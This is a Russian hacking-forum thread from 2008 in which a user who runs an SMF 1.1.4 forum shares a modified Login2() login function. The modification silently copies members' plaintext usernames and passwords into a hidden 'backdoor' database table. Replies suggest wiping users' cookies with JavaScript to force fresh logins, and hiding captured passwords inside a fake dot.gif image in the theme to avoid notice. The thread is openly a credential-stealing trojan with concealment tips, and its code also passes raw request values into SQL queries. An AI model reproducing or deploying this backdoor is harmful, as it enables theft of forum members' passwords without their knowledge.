Форумы Троянизация Smf

Discussion in 'Уязвимости CMS/форумов' started by ty13r, 26 Mar 2008.

  1. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    У меня есть подконтрольный форум - smf версии 1.1.4. Хотелось бы узнать пароли юзеров, а расшифровывать лень. Появилась идея затроянить форум.
    Для этого в файле Sources/LogInOut.php рассмотрим функцию Login2()
    Code:
    if ($user_settings['passwd'] != $sha_passwd)
    	{....}
    elseif ($user_settings['passwordSalt'] == '')
    	{...}
    
    Этот код я заменил на
    Code:
    if ($user_settings['passwd'] != $sha_passwd)
    	{....}
    elseif ($user_settings['passwordSalt'] == '')
    	{...}
    else
    	{
    		$req = db_query("SELECT * FROM {$db_prefix}backdoor WHERE `id`={$user_settings['ID_MEMBER']}");
    		$user = mysql_fetch_array($req);
    		if(!$user)
    			$req = db_query("INSERT INTO {$db_prefix}backdoor SET `id`='".$user_settings['ID_MEMBER']."' ,`name`='".$_REQUEST[user]."' ,`pass`='".$_REQUEST[passwrd]."'");
    		if($user['pass']!=$_REQUEST['passwrd'])
    			$req = db_query("UPDATE {$db_prefix}backdoor SET `pass`='".$_REQUEST[passwrd]."' WHERE `id`='".$user_settings['ID_MEMBER']."'");
    	}
    
    где backdoor - заранее созданная таблица.
    На локалхосте все это прекрасно работает но на искомом форуме в большинстве записей вместо пароля стоят звездочки(
    Что сделано неправильно? Может кто имеет успешный опыт затроянивания?
    PS
    Как сбросить сессии пользователей чтобы они вводили пароль заново? Почему то очистка таблицы sessions не помогает
     
  2. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    на счёт сессии ... думаю дело не в сссии а в кукисах тоесть при входе берутся данные из кукисов и происходит авторизация... а сесия тут не причём т.к она по любому удаляется при закрытии браузера... может попытатся при входе юзеров удалить их кукисы и всё?

    всё вышесказаное основано на догадках...
     
  3. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    В этом посте в IPB сбрасывались именно сессии.
    Тем более опять же на локалхосте проверял - работало, а на том форуме - нет
     
    #3 ty13r, 27 Mar 2008
    Last edited: 27 Mar 2008
  4. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Модеры, плиз перенесите тему в УЯЗВИМОСТИ а то тут никто ее и не прочтет
     
  5. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    а почему бы тебе в самом деле при помощи жабаскрипта не обнулить куки и не перекинуть юзверя на главную страницу ?
    А по поводу троянизации .... я делал проще, без заморочек ...
    Создаёш в дефолтной теме картинку , ну например dot.gif и в этот файлик пишеш пассы которые отправляют юзвери скрипту, так и палева меньше чем с бд